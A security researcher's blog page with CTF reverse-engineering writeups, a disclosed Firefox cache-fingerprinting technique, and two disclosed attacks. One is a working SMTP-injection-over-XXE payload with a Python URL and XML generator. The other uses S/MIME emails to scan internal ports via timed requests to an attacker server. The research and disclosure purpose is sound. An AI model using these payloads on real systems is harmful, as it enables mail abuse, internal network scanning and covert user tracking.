shift or die

security. photography. foobar.

mrmcd CTF writeup: Friendly Machine

I recently participated in the MRMCD CTF. My favourite challenge was called “Friendly Machine”.

It consisted of a Python script which reads code from a Base64-encoded JSON-encoded array. The array itself looks something like this:

[
   {
      "ZeiteesohpiefeeyuHah" : "start",
      "Jeicheidahmeichetaik" : "ZeiteesohpiefeeyuHah"
   },
   {
      "sebeeluoCaedohlaehoh" : "ZERO",
      "IeCilahWaishaibiemoo" : 0,
      "Jeicheidahmeichetaik" : "ayahshecieleeYeingis"
   },
   {
      "IeCilahWaishaibiemoo" : 0,
      "sebeeluoCaedohlaehoh" : "RES",
      "Jeicheidahmeichetaik" : "ayahshecieleeYeingis"
   },
   {
      "ZeiteesohpiefeeyuHah" : "lencheck_start",
      "Jeicheidahmeichetaik" : "ZeiteesohpiefeeyuHah"
   },
[...]

Hmmm, that kinda looks like variable assignments, labels, etc.? And sure enough, the main Friendly Machine code keeps a dictionary of variables and, depending on the entry at the current position in the code (yes, there are jumps, so execution is not necessarily linear), performs assignments or operations. Our goal is to end up in a position where we return 0, since that means the flag is correct.

First I set out to see whether I could add some debug output to the execution, but that turned out to be more confusing than helpful. Static analysis it is, then. I wrote a script to output the code in a more readable form:

# `code` is the list of instruction dicts decoded from the Base64/JSON blob.
# The value under "Jeicheidahmeichetaik" is the opcode of each entry.
for i in range(len(code)):
    if code[i]["Jeicheidahmeichetaik"] == "bohxudohMeiteipiVaeZ":
        # read the next input byte into a variable
        print(code[i]["yuGhoxeebaivaiteifai"] + "=pwbyte")
    elif code[i]["Jeicheidahmeichetaik"] == "chahghoaThoariaCowoh":
        # return the value of a variable
        print("ret " + str(code[i]["shumeesaiXoohigheari"]))
    elif code[i]["Jeicheidahmeichetaik"] == "ayahshecieleeYeingis":
        # assign a constant
        print(code[i]["sebeeluoCaedohlaehoh"] + "=" + str(code[i]["IeCilahWaishaibiemoo"]))
    elif code[i]["Jeicheidahmeichetaik"] == "DaweeyeiZaiceemeitah":
        print(code[i]["iesheiQuiphaipohquei"] + "=" + code[i]["Koobaicahxaexeicohno"] + "+" + code[i]["OhNgaesiequievaijaca"])
    elif code[i]["Jeicheidahmeichetaik"] == "geethahshiuxiyeitooH":
        print(code[i]["SheixienaigeeSaeHahC"] + "=" + code[i]["looheThedohsouquoogo"] + "-" + code[i]["UaYaDaeciekeemeehein"])
    elif code[i]["Jeicheidahmeichetaik"] == "uDohngaephaethahngah":
        print(code[i]["ietaiviexuaniequeZie"] + "=" + code[i]["saichuqueiShieRaeYie"] + "^" + code[i]["RahThiefudeimahhohch"])
    elif code[i]["Jeicheidahmeichetaik"] == "AhkiexaZeishieKohqui":
        print(code[i]["eepuozeeviexoopieMoi"] + "=" + code[i]["aageenuxeLaeBaidoaru"] + "|" + code[i]["PeGoawoowiuthoobaaTh"])
    elif code[i]["Jeicheidahmeichetaik"] == "riatheihoxooziitahGo":
        print(code[i]["eishaBeiwiYahSiexaem"] + "=" + code[i]["IsichaikuaNeiHahRaiH"] + "&" + code[i]["thuyaecenaethiPochie"])
    elif code[i]["Jeicheidahmeichetaik"] == "ieZieyiechooTeilaexe":
        # conditional jump: find the entry defining the target label and
        # print its (1-based) line number
        for entry in code:
            if "ZeiteesohpiefeeyuHah" in entry:
                if entry["ZeiteesohpiefeeyuHah"] == code[i]["aNaeNeeyooCeezaiGeeb"]:
                    print("jmp " + str(code.index(entry) + 1) + " if " + code[i]["ozeeleephuiGaechaiSh"] + "==0")
                    break
    else:
        # label definitions (and anything unknown) become nop
        print("nop")

This leads to the following “code” (first few lines):

  1	nop
  2	ZERO=0
  3	RES=0
  4	nop
  5	ONE=1
  6	COUNT=0
  7	nop
  8	x=pwbyte
  9	x=x+ONE
 10	jmp 13 if x==0
 11	COUNT=COUNT+ONE
 12	jmp 7 if ZERO==0
 13	nop
 14	x=28
 15	x=COUNT-x
 16	jmp 21 if x==0
 17	jmp 18 if ZERO==0
 18	nop
 19	o=-1
 20	ret o
 21	nop
 22	ohhayeexongoakaeVuph=0
 23	jmp 24 if ZERO==0
 24	nop

Note that “pwbyte” represents “read a byte from the input and return -1 if we read beyond the string length”. So we read byte by byte and increase COUNT by ONE until pwbyte returns -1, at which point x+ONE becomes 0 and we jump to line 13. Lines 14 to 16 show us that our flag needs to be 28 characters long, since otherwise we would return -1.

Let’s continue:

 25	A=pwbyte
 26	B=77
 27	C=A-B
 28	RES=RES|C
 29	A=pwbyte
 30	B=82
 31	C=A-B
 32	RES=RES|C
 33	A=pwbyte
 34	B=77
 35	C=A-B
 36	RES=RES|C

Oh, 77, 82, 77, or M, R, M again. This looks good! And from the equations we can see that our input needs to be exactly these values in order to keep RES (which will be returned at the very end) nicely at 0: since each difference C is OR-ed into RES, a single non-zero C would leave RES non-zero for good.

The code continues similarly, but gets a bit more complex:

[...]
 49	X=pwbyte
 50	t=7
 51	Y=X-t
 52	t=90
 53	C=Y^t
 54	RES=RES|C
 55	X=pwbyte
 56	t=15
 57	Y=X-t
 58	t=80
 59	C=Y^t
[...]
 79	X=pwbyte
 80	t=999
 81	Y=t-X
 82	t=900
 83	C=Y^t
 84	RES=RES|C
 85	X=pwbyte
 86	t=1
 87	Y=t+X
 88	t=102
 89	C=Y-t
 90	RES=RES|C
[...]

One could solve all these things algebraically, but luckily for me my “decompiler” outputs syntactically valid Python, so I was lazy and brute-forced each character by looping over possible pwbyte values and checking when RES ended up being 0.
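For illustration, here is what the algebraic route looks like for the four blocks shown above. The helper names are made up; each one simply inverts one of the patterns in the listing, using the fact that `Y ^ t` is 0 exactly when `Y == t`:

```python
# Hypothetical helpers: each inverts one block pattern from the listing above.
# All rely on the fact that (Y ^ t) == 0 exactly when Y == t.

def solve_sub_xor(t1, t2):
    """X=pwbyte; Y=X-t1; C=Y^t2  ->  C == 0 iff X == t2 + t1."""
    return t2 + t1


def solve_rsub_xor(t1, t2):
    """X=pwbyte; Y=t1-X; C=Y^t2  ->  C == 0 iff X == t1 - t2."""
    return t1 - t2


def solve_add_sub(t1, t2):
    """X=pwbyte; Y=t1+X; C=Y-t2  ->  C == 0 iff X == t2 - t1."""
    return t2 - t1


chars = [
    solve_sub_xor(7, 90),      # lines 49-54
    solve_sub_xor(15, 80),     # lines 55-60
    solve_rsub_xor(999, 900),  # lines 79-84
    solve_add_sub(1, 102),     # lines 85-90
]

# Cross-check one block by brute force over all ASCII values
assert [x for x in range(128) if ((x - 7) ^ 90) == 0] == [chars[0]]

print("".join(map(chr, chars)))  # prints "a_ce"
```

The four bytes come out as a, _, c and e, which match the corresponding characters of the flag further down. Doing this for every block by hand gets old quickly, though.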

During the CTF I did this manually with a bit of copy-and-paste and running Python, but for the sake of “AUTOMATE ALL THE THINGS!!111ELF”, here’s a script that does the same:

#!/usr/bin/env python3

import sys

START_CODE = "for pwbyte in range(128):\n\tRES = 0\n"

code = open('code', 'r').readlines()

current_block = START_CODE
# start at line 25, after the length check
for i in range(24, len(code)):
    current_block += "\t" + code[i]
    if 'RES=' in code[i]: # RES gets assigned, we want this to be 0
        current_block += "\tif RES == 0:\n"
        current_block += "\t\tprint(chr(pwbyte), end='')\n"
        sys.stderr.write("Current code block:\n" + current_block)
        exec(current_block) # don't run on untrusted input ;-)
        current_block = START_CODE
print()

Running it gives us the flag:

$ ./bruteforce.py 2>/dev/null
MRMCD{a_processor_in_python}

mrmcd CTF writeup: Once Upon A Time

I recently participated in the MRMCD CTF, which had a challenge called “Once Upon A Time”. The hint for the binary was that it will simply print the flag … but some patience might be required.

Since I am much less of a binary reverse-engineering ninja than the scoreboard might suggest, I threw the binary into the Snowman decompiler.

Here, I quickly recognized the following structure:

v4 = 0;
do {
	v5 = 1;
	while (v5) {
		++v5;
	}
	--v4;
} while (v4 != 77);
fun_640("%d done\n", 0, 64, "%d done\n", 0, 64);

v6 = 0;
do {
	v7 = 1;
	while (v7) {
		++v7;
	}
	--v6;
} while (v6 != 82);
fun_640("%d done\n", 1, 64, "%d done\n", 1, 64);

[...]

So the challenge hint was technically correct: the inner while loop runs until the (64-bit) v5 overflows and becomes 0, and the outer loop only terminates once v4, having wrapped around from 0 to 2**64 - 1, has been decremented all the way down to 77.
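To put “some patience” into numbers, here is a rough count, assuming the counters behave like unsigned 64-bit integers and an (optimistic, purely assumed) rate of one billion loop iterations per second:

```python
WRAP = 2**64  # the counters are 64 bits wide and wrap around modulo 2**64


def inner_iterations():
    # v5 starts at 1 and is incremented until it wraps around to 0
    return WRAP - 1


def outer_iterations(target):
    # v4 starts at 0 and is decremented (0 -> 2**64 - 1 -> ...) until it equals target
    return (0 - target) % WRAP


# Inner-loop iterations needed before "0 done" (target 77, i.e. 'M') is printed
total = outer_iterations(ord("M")) * inner_iterations()

RATE = 10**9  # ASSUMPTION: one billion loop iterations per second
SECONDS_PER_YEAR = 365 * 24 * 3600
print(f"{total:.3e} iterations, roughly {total / RATE / SECONDS_PER_YEAR:.1e} years")
```

That is for the first character alone, so patching or reading the targets directly is the only realistic option.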

At this point, one could have patched the decrements into increments and vice-versa, but that seemed quite tedious.

If you look closely, though, you can notice that the desired values for v4 and v6 correspond to the ASCII characters M and R, the usual start of a flag. During the CTF I simply converted them manually and concatenated them, but for the sake of (useless?) automation, here’s a one-liner to get the flag:

$ grep '} while (v' once_upon_a_time.c | cut -d'=' -f2 | cut -d ')' -f1 | python -c 'import sys; chars = sys.stdin.readlines(); print("".join([chr(int(c, 0)) for c in chars]))'
MRMCD{so_sorry_for_the_delay}

Fingerprinting Firefox users with cached intermediate CA certificates (#fiprinca)

[TLDR: Firefox caches intermediate CA certificates. A third-party website can infer which intermediates are cached by a user. To do this, it loads content from incorrectly configured hosts (missing intermediate in the provided certificate chain) and observes whether they load correctly (yes: corresponding intermediate was cached, no: it was not). Check out my proof of concept using more than 300 intermediate CAs. This technique can be used to gain a fingerprint for a user but also leaks semantic information (mainly geographical). Since Private Browsing mode does not isolate the cache, it can be used to link a Private Browsing user to her real profile. Furthermore, attackers could force users to visit correctly configured websites with unusual intermediates and thus set a kind of supercookie. This has been reported as #1334485 in the Mozilla bug tracker.]

The idea

A few months ago, I was sitting in Ivan Ristić’s course »The Best TLS Training in the World« (which I highly recommend, by the way). One thing Ivan mentioned was that probably the most common misconfiguration when setting up a TLS web server is forgetting to deliver the complete certificate chain. Let me use some pictures to explain it. Here is the correct case:

Correctly configured

In case the server is misconfigured, the situation looks as follows:

Incorrectly configured

An idea came to my mind: if the behaviour differs depending on the cache, can I observe that from the outside? A quick look around ssllabs.com for a site with an incomplete chain, together with a <img src=https://brokensite/favicon.ico onload=alert(1) onerror=alert(2)>, showed me that this was indeed feasible in Firefox (Chrome and Internet Explorer somehow both magically load the image/site even when the chain is not delivered; possibly they fetch the missing intermediate via the caIssuers entry of the Authority Information Access extension?). Interestingly enough, the cached CAs from the main profile were also used in Private Browsing mode.
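The inference itself is simple. Here is a small Python model of it, not browser code: in the real proof of concept the bit comes from the image's onload/onerror handler, and the hostnames and intermediate identifiers below are made up.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Probe:
    """Hypothetical record for one misconfigured host used as a probe."""
    image_url: str             # an image on the host that omits its intermediate
    missing_intermediate: str  # identifier of the intermediate it fails to send


def image_loads(probe, cached_intermediates):
    # Firefox can only complete the chain (and load the image) if it already
    # has the missing intermediate in its cache
    return probe.missing_intermediate in cached_intermediates


def fingerprint(probes, cached_intermediates):
    # One bit per probe: 1 = onload fired (cached), 0 = onerror fired (not cached)
    return "".join("1" if image_loads(p, cached_intermediates) else "0" for p in probes)


probes = [
    Probe("https://broken-a.example/logo.png", "Intermediate A"),
    Probe("https://broken-b.example/logo.png", "Intermediate B"),
    Probe("https://broken-c.example/logo.png", "Intermediate C"),
]
print(fingerprint(probes, {"Intermediate A", "Intermediate C"}))  # prints "101"
```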

Gathering data

Lurking around ssllabs.com to find new hosts with incomplete chains did not sound like a fun idea, and I guess Qualys would not have been too happy if I had automated the process. So I had to come up with a better way to gather hosts for a proof of concept. Luckily, there are public datasets of the TLS server landscape available. The two I ended up using were the Censys.io scans (free researcher account needed) and Rapid7's Project Sonar data (free to download).

In the first step, I wanted to identify all possible intermediate CA certificates that chain up to a trusted root CA. For this, I downloaded the Root CA extract provided by the curl project. Then I looked at all CA certificates in the datasets and checked with openssl verify to see if they are a direct intermediate of one of the trusted roots. To further identify intermediate CAs that chain up to a trusted root in a longer path, I ran this process in an iterative fashion using the root CAs and already identified intermediates until no more new intermediates were found in the datasets. I ended up with 3366 individual CA certificates that chain up to a trusted root (1931 on the first level, 1286 on the second level, 92 on the third level and 57 on the fourth level).
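The iterative step is essentially a fixed-point computation. A minimal sketch, assuming issuance can be decided by comparing issuer and subject names; the actual process used openssl verify, which also checks signatures, so treat this as a simplification:

```python
def find_intermediates(root_subjects, ca_certs):
    """Iteratively collect CA certificates that chain up to a trusted root.

    root_subjects: set of subject names of the trusted roots
    ca_certs: dict mapping a certificate id to its (subject, issuer) names
    Returns a dict mapping certificate id -> level (1 = issued by a root).
    """
    trusted = set(root_subjects)  # subjects we can already chain up from
    levels = {}
    level = 0
    while True:
        level += 1
        # certificates issued by something already trusted, not found yet
        new = {
            cid
            for cid, (subject, issuer) in ca_certs.items()
            if cid not in levels and subject not in root_subjects and issuer in trusted
        }
        if not new:  # fixed point reached: no more intermediates in the data
            return levels
        for cid in new:
            levels[cid] = level
        trusted |= {ca_certs[cid][0] for cid in new}
```

Counting the values of the returned dict (e.g. with collections.Counter) gives a per-level breakdown like the one above.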

The next step was identifying websites which were misconfigured. For this, the Project Sonar data came in handy as they scan the complete IPv4 internet and record the delivered certificate chain for each IP on port 443. Since they provide the certificates individually and the scan data only contains hashes of the chain elements, I first had to import all the certificates into a SQLite database in order to quickly look them up by hash. Despite ending up with a database file of roughly 100 GB, SQLite performed quite nicely. I then processed this data by looking at all certificates to see if they contained an issuer (by looking at the Authority Key Identifier extension) that was present in my set of CAs, but not delivered in the chain. If this was the case, I had identified the IP address of a misconfigured host. Now it was necessary to see if the certificate used a hostname which actually resolved to that IP address. If that was the case, I had a candidate for an incorrectly configured webserver.
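The lookup itself could be sketched as follows with Python's built-in sqlite3 module. The table and column names are hypothetical, and key identifiers are assumed to be stored as hex strings; the Authority Key Identifier of a delivered certificate is compared with the Subject Key Identifiers of the known intermediates and of the certificates actually delivered. The later hostname/IP check is not shown.

```python
import sqlite3


def create_schema(conn):
    # Hypothetical schema: one row per certificate, looked up by its hash
    conn.execute(
        "CREATE TABLE IF NOT EXISTS certs (hash TEXT PRIMARY KEY, ski TEXT, aki TEXT)"
    )


def missing_intermediate(conn, chain_hashes, known_ca_skis):
    """Return the key identifier of a known intermediate that issued one of the
    delivered certificates but was not itself delivered, or None."""
    delivered = []
    for h in chain_hashes:
        row = conn.execute("SELECT ski, aki FROM certs WHERE hash = ?", (h,)).fetchone()
        if row is not None:
            delivered.append(row)
    delivered_skis = {ski for ski, _ in delivered}
    for _, aki in delivered:
        # The Authority Key Identifier names the issuer's Subject Key Identifier
        if aki in known_ca_skis and aki not in delivered_skis:
            return aki
    return None


conn = sqlite3.connect(":memory:")
create_schema(conn)
conn.executemany(
    "INSERT INTO certs VALUES (?, ?, ?)",
    [("leaf-hash", "leaf-ski", "inter-ski"), ("inter-hash", "inter-ski", "root-ski")],
)
print(missing_intermediate(conn, ["leaf-hash"], {"inter-ski"}))  # prints "inter-ski"
```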

The last step was to identify a working image on that webserver which could be loaded. I considered several options but settled on just loading the website in Firefox and using Burp to observe which images were loaded. This left me with a Burp state file of several gigabytes and a long list of URLs covering more than 300 individual intermediate CAs.

The proof of concept

I used this list of URLs to build a proof of concept using elm, my favourite way to avoid writing JavaScript these days. Here is what part of the output looks like for me (together with Firebug’s Net Panel, which shows which images were loaded):

PoC output

Note that it might occasionally contain false positives or false negatives, since the servers that are used for testing are not under my control and might change their TLS configuration and/or location of images.

If you run the proof of concept yourself, you will be presented with an option to share your result with me. Please do so: I am grateful for every data point obtained this way, as it helps me see what additional information can be extracted from it (geographical location? specific interests of the user? etc.).

Further ideas

One thing that is pretty easy to see is that this technique could also be used in a more active way by forcing users to visit correctly configured websites whose certificates come from unusual intermediates. Note that the PKI of the »Deutsches Forschungsnetzwerk«, for example, comes in handy here, as it provides literally hundreds of (managed) intermediates for its members, including lots of tiny universities and research institutes. One could force the user to cache a certain subset of unusual intermediates and then check later, from a different domain, which intermediates are cached. This is of course not foolproof, since users might visit correctly configured websites using those intermediates and thus flip bits from 0 to 1. Error-correcting codes could be used here to deal with that problem (with the tradeoff of having to use more intermediates).
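I have not specified which error-correcting code to use. As a minimal illustration (my choice, not a recommendation), a 3x repetition code with majority voting tolerates one spurious 0 to 1 flip per group, at the cost of three intermediates per identifier bit:

```python
def encode(user_id, bits=8, reps=3):
    """Which of bits * reps intermediates the user should be made to cache (1 = cache).

    Each identifier bit is simply repeated `reps` times (a repetition code).
    """
    return [(user_id >> i) & 1 for i in range(bits) for _ in range(reps)]


def decode(observed, bits=8, reps=3):
    """Recover the identifier from observed cache bits by majority vote."""
    value = 0
    for i in range(bits):
        group = observed[i * reps:(i + 1) * reps]
        if 2 * sum(group) > reps:  # more than half of the copies are cached
            value |= 1 << i
    return value


planted = encode(0b10110010)
observed = list(planted)
observed[0] = 1  # the user happened to visit a site using this intermediate: 0 -> 1
print(decode(observed) == 0b10110010)  # prints "True"
```

Since the noise only ever turns 0 into 1, codes designed for such asymmetric channels could be more efficient; the repetition code just keeps the idea easy to follow.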

In addition to the purely »statistical« view of having a fingerprint with a sequence of n bits representing the cache status for each tested CA, the fingerprint also contains additional semantic information. Certain CAs have customers mostly in one country or region, or might have even more specific use-cases which let you infer even more information, e.g. a user who has the »Deutsche Bundestag CA« cached is most probably located in Germany and probably at least somewhat interested in politics.

From an attacker’s perspective, this could also be used to check whether the browser is running inside a malware analysis sandbox (which would probably have none or very few of the common intermediates cached) and to deliver different content based on that information.

Solutions

I reported the problem to Mozilla on January 27th, 2017 in bug #1334485. The cleanest solution would obviously be to not connect to incorrectly configured servers, regardless of whether the intermediate is cached or not. Understandably, Mozilla is reluctant to implement that without knowing the impact. Thus bug #1336226 has been filed to implement some related telemetry; let’s see how that goes.

From a user’s perspective, at the moment I can only recommend regularly cleaning up your profile (by creating a fresh one, cleaning it up from the Firefox UI or using the certutil command line tool). Alternatively, blocking third-party requests with an add-on such as Request Policy might be useful, since the attack obviously needs to make (a lot of) third-party requests.

SMTP over XXE − how to send emails using Java's XML parser

I regularly find XML eXternal Entity (XXE) vulnerabilities while performing penetration tests. These are particularly often present in Java-based systems, where the default for most XML parsers is still to parse and act upon inline DTDs, even though I have not seen a single use case where this was really necessary. While the vulnerability is useful for file disclosures (and Java is nice enough to also provide directory listings) or even process listings (via /proc/pid/cmdline), I recently stumbled over another interesting attack vector when using a Java XML parser.

Out of curiosity, I looked at which protocols are supported in external entities. In addition to the usual ones such as http and https, Java also supports ftp. The actual connection to the FTP server is implemented in sun.net.ftp.impl.FtpClient. It supports authentication, so we can put usernames and passwords in the URL, such as in ftp://user:password@host:port/file.ext, and the FTP client will send the corresponding USER command in the connection.

The (presumably ancient) code has a bug, though: it does not verify the syntax of the user name. RFC 959 specifies that a username may consist of a sequence of any of the 128 ASCII characters except <CR> and <LF>. Guess what the JRE implementers forgot? Exactly: to check for the presence of <CR> or <LF>. This means that if we put %0D%0A anywhere in the user part of the URL (or the password part, for that matter), we can terminate the USER (or PASS) command and inject a new command into the FTP session.
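To make the framing problem concrete, here is a small Python model of the behaviour described above. It is not the JRE code; the function names and the host are hypothetical.

```python
from urllib.parse import unquote, urlsplit


def login_commands(url):
    """Model of a client that percent-decodes the credentials from an ftp:// URL
    and sends them without checking for CR/LF."""
    parts = urlsplit(url)
    user = unquote(parts.username or "anonymous")
    password = unquote(parts.password or "")
    return f"USER {user}\r\nPASS {password}\r\n"


def lines_seen_by_server(wire):
    # The server treats every CRLF-terminated line as one command
    return wire.split("\r\n")[:-1]


wire = login_commands("ftp://a%0D%0ANOOP:secret@ftp.example.org:21/file.ext")
print(lines_seen_by_server(wire))  # prints ['USER a', 'NOOP', 'PASS secret']
```

The decoded CRLF ends the USER line early, so NOOP arrives at the server as a command of its own.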

While this may be interesting on its own, it allows us to do something else: to speak SMTP instead of FTP. Note that for historical reasons, the two protocols are structurally very similar. For example, on connecting, they both send a reply with a 220 code and text:

$ nc ftp.kernel.org 21
220 Welcome to kernel.org
$ nc mail.kernel.org 25
220 mail.kernel.org ESMTP Postfix

So, if we send a USER command to a mail server instead of an FTP server, it will answer with an error code (since USER is not a valid SMTP command), but let us continue with our session. Combined with the bug mentioned above, this allows us to send arbitrary SMTP commands, and thus emails. For example, let’s set the URL to the following (newlines added for readability):

ftp://a%0D%0A
EHLO%20a%0D%0A
MAIL%20FROM%3A%3Ca%40example.org%3E%0D%0A
RCPT%20TO%3A%3Calech%40alech.de%3E%0D%0A
DATA%0D%0A
From%3A%20a%40example.org%0A
To%3A%20alech%40alech.de%0A
Subject%3A%20test%0A
%0A
test!%0A
%0D%0A
.%0D%0A
QUIT%0D%0A
:a@shiftordie.de:25/a
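Building such a URL by hand is error-prone, so here is a sketch of how it could be generated and wrapped in an XXE document with Python's urllib.parse.quote. The helper names and the entity name are mine; the command list reproduces the example above. Note that quote() also percent-encodes characters such as !, which the listing leaves as-is; both forms decode to the same bytes.

```python
from urllib.parse import quote


def smtp_over_ftp_url(host, commands, port=25):
    """Smuggle SMTP commands into the user part of an ftp:// URL.

    The leading "a" becomes the (failing) USER argument; each following
    command is terminated with CRLF so the mail server sees it on its own line.
    """
    user = "a\r\n" + "".join(cmd + "\r\n" for cmd in commands)
    return f"ftp://{quote(user, safe='')}:a@{host}:{port}/a"


def xxe_document(url):
    # External entity pointing at the URL; expanding &e; makes the parser connect
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [<!ENTITY e SYSTEM "{url}">]>\n'
        "<r>&e;</r>\n"
    )


message = "From: a@example.org\nTo: alech@alech.de\nSubject: test\n\ntest!\n"
url = smtp_over_ftp_url(
    "shiftordie.de",
    ["EHLO a", "MAIL FROM:<a@example.org>", "RCPT TO:<alech@alech.de>",
     "DATA", message, ".", "QUIT"],
)
print(xxe_document(url))
```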

When sun.net.ftp.impl.FtpClient connects using this URL, the following commands will be sent to the mail server at shiftordie.de:

USER a<CR><LF>
EHLO a<CR><LF>
MAIL FROM:<a@example.org><CR><LF>
RCPT TO:<alech@alech.de><CR><LF>
DATA<CR><LF>
From: a@example.org<LF>
To: alech@alech.de<LF>
Subject: test<LF>
<LF>
test!<LF><CR><LF>
.<CR><LF>
QUIT<CR><LF>

From Java’s perspective, the “FTP” connection fails with a sun.net.ftp.FtpLoginException: Invalid username/password, but the mail is already sent.

This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing. It even allows for sending attachments, since the URL length seems to be unrestricted and only limited by available RAM (parsing a 400 MB long URL did take more than 32 GB of RAM for some reason, though ;-)).

A portscan by email − HTTP over X.509 revisited

Disclaimer: This was originally posted on blog.nruns.com. Since n.runs went bankrupt, the blog is defunct now. I reposted this here in July 2015 to preserve it for posterity.

The history

Design bugs are my favourite bugs. About six years ago, while I was working in the Public Key Infrastructure area, I identified such a bug in the X.509 certificate chain validation process (RFC 5280). By abusing the authority information access id-ad-caissuers extension, it allowed for triggering (blind) HTTP requests when (untrusted, attacker-controlled) certificates were validated. Microsoft was one of the few vendors who actually implemented that part of the standard, and Microsoft CryptoAPI was vulnerable to it. Corresponding advisories (Office 2007, Windows Live Mail and Outlook) and a whitepaper were released in April 2008.

This issue was particularly interesting because it could be triggered by an S/MIME-signed email when opened in Microsoft Outlook (or other Microsoft mail clients using the CryptoAPI functionality). This allowed attackers to trigger arbitrary HTTP requests (also to internal networks), but not to gain any information about the result of the request. Also, because the request was made using CryptoAPI and not in a browser, it was impossible to exploit any kind of Cross Site Request Forgery issues in web applications, so the impact of the vulnerability was quite limited. In fact, I would consider this mostly a privacy issue, because the most interesting application was to find out that an email had been opened (and from which IP address and with which version of CryptoAPI), something that was otherwise (to my knowledge) pretty much impossible in Outlook (emailprivacytester.com, a very interesting service with many tests for email privacy issues, seems to confirm that).

Revisiting the issue

In May 2012, I revisited the issue to see whether something I had been thinking about previously could be implemented: leveraging the issue to do port scanning on internal hosts by alternating between internal and external HTTP requests and measuring the timing distance on the (attacker-controlled) external host. It turned out that with a specific combination of nested S/MIME signatures with particularly long URLs (about 3500 characters, don’t ask me why exactly they are needed), one can actually observe a difference in timing between an open port and a closed port.

To test this, URLs that are triggered by the email would for example look similar to the following:

  1. http://[attacker_server]/record_start?port=1&[3500*A]
  2. http://[internal_target_ip]:1/[3500*A]
  3. http://[attacker_server]/record_stop?port=1&[3500*A]
The scripts »record_start« and »record_stop« on the server are used to measure the time difference between the two external requests (1 and 3), with which we can tell (roughly) how long the internal request to port 1 on the internal target IP took.

Testing showed that in case the port is open, the time difference measured between the two external requests was significantly below one second, while if the port was closed, it was a bit above one second.
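The measuring side can be sketched like this. Everything here is a hypothetical stand-in for the record_start/record_stop scripts: the host names are placeholders, and the one-second threshold is simply taken from the measurements described above.

```python
from urllib.parse import parse_qs, urlsplit


def probe_urls(attacker, target_ip, port, pad=3500):
    """The three URLs triggered for one port: start marker, internal target, stop marker."""
    filler = "A" * pad  # long URLs were needed to make the timing observable
    return [
        f"http://{attacker}/record_start?port={port}&{filler}",
        f"http://{target_ip}:{port}/{filler}",
        f"http://{attacker}/record_stop?port={port}&{filler}",
    ]


class Recorder:
    """Hypothetical stand-in for the record_start / record_stop scripts."""

    def __init__(self, threshold=1.0):
        self.threshold = threshold  # seconds; open ports stayed well below this
        self.starts = {}
        self.results = {}

    def hit(self, url, now):
        parts = urlsplit(url)
        port = parse_qs(parts.query)["port"][0]
        if parts.path == "/record_start":
            self.starts[port] = now
        elif parts.path == "/record_stop" and port in self.starts:
            elapsed = now - self.starts.pop(port)
            self.results[port] = "open" if elapsed < self.threshold else "closed"


rec = Recorder()
start, _, stop = probe_urls("attacker.example", "10.0.0.1", 22)
rec.hit(start, now=100.0)
rec.hit(stop, now=100.4)
print(rec.results)  # prints {'22': 'open'}
```

Ports on the list discussed below would always show up as “open” with this simple threshold, so their results have to be discarded.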

Unfortunately, we are not able to observe this for all possible ports. For HTTP requests to a list of well-known ports, the timing difference was short regardless of whether they were open or closed, making it impossible to determine their state. My current assumption is that this is because the HTTP client library used by CryptoAPI does not allow connections on those ports to avoid speaking HTTP(S) on them (similar to browsers, which typically make it impossible to speak HTTP on port 25).

A single email can be used to scan the 50 most-used (as determined by nmap) ports on a single host. A proof of concept which scans 127.0.0.1 has been implemented and can be tried out by sending an empty email to smime-http-portscan@klink.name. You will receive an automatic reply with an S/MIME-signed message which, when opened, will trigger a number of HTTP requests to ports on localhost and to a data logger running on my webserver. After a few minutes, you can check on a web interface which ports are open and which ones are closed. Sometimes your Exchange mail server might refuse to deliver the test email, though, because it contains a lot of nested MIME parts (try again with a more relaxed mail server then ;-)).

Problem solved

After repeatedly bugging the Microsoft Security Response team about the issue (and accidentally discovering an exploitable WriteAV issue when too many S/MIME signatures were used – MS13-068, fixed in the October 2013 patch day), this has now been fixed with the November 2013 patch day release (CVE-2013-3870). In case the id-ad-caissuers functionality is actually needed in an organization, the functionality can be turned on again, though – with the risk of still being vulnerable to this issue.

Geohashing with GPX files and QLandkarte GT

Because of some scientists near the south pole, I recently re-discovered geohashing. As I wanted an easy way to see the most recent hash points (and the upcoming one(s), since I live east of W30), I did some automation.

The different online services are pretty nice, but they did not have all the features I wanted. Also, I have grown quite fond of having an OpenStreetMap available offline (not necessarily because I am offline that much, but because it makes looking at the map so much faster). I use QLandkarte GT and the Openmtbmap.org map, as it shows cycling routes quite nicely.

QLandkarte GT supports loading GPX files, so the first thing I needed was something to produce GPX files for a given graticule (and date, or if no date is specified, for all upcoming ones). I wanted something similar to the Small Hash Inquiry Tool, as it shows you the hash points of the surrounding graticules as well. I took an evening to hack something together using Ruby, Sinatra and relet’s JSON web service. I decided to host it on Heroku, as it was easy and free. You can find out how to use it at http://geohashing-gpx.heroku.com. It should also work quite nicely with GPS devices with GPX support (or with gpsbabel, for that matter). The source is available at git://git.alech.de/geohashing_gpx.git, if you are curious.
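The core computation is the standard geohashing algorithm from xkcd #426: take the MD5 of “date-DJIA opening value” and use the two halves of the hex digest as hexadecimal fractions for latitude and longitude. Here is a Python sketch of that plus a minimal GPX writer. This is not the Ruby/Sinatra code behind the service, and the function names are mine. Picking the right DJIA value (including the 30W rule) is left to the caller, and edge cases at the poles and at ±180° are ignored.

```python
import hashlib
import xml.etree.ElementTree as ET


def geohash(date_iso, djia_open, lat_grat, lon_grat):
    """Hash point for one graticule.

    date_iso: "YYYY-MM-DD"; djia_open: the applicable DJIA opening value as a
    string (e.g. "10458.68"); graticules are strings so that "-0" keeps its sign.
    """
    digest = hashlib.md5(f"{date_iso}-{djia_open}".encode("ascii")).hexdigest()
    lat_frac = int(digest[:16], 16) / 16**16  # first half -> latitude decimals
    lon_frac = int(digest[16:], 16) / 16**16  # second half -> longitude decimals

    def combine(grat, frac):
        value = abs(int(grat)) + frac
        return -value if grat.startswith("-") else value

    return combine(lat_grat, lat_frac), combine(lon_grat, lon_frac)


def neighbours(grat):
    """Adjacent graticules, respecting the ... -1, -0, 0, 1 ... ordering."""
    # map "-0" -> -1, "-1" -> -2, "0" -> 0, "1" -> 1, ...
    idx = -abs(int(grat)) - 1 if grat.startswith("-") else int(grat)

    def to_str(i):
        return str(i) if i >= 0 else f"-{-i - 1}"

    return [to_str(idx - 1), to_str(idx + 1)]


def gpx(date_iso, djia_open, lat_grat, lon_grat):
    """GPX 1.1 document with waypoints for a graticule and its eight neighbours."""
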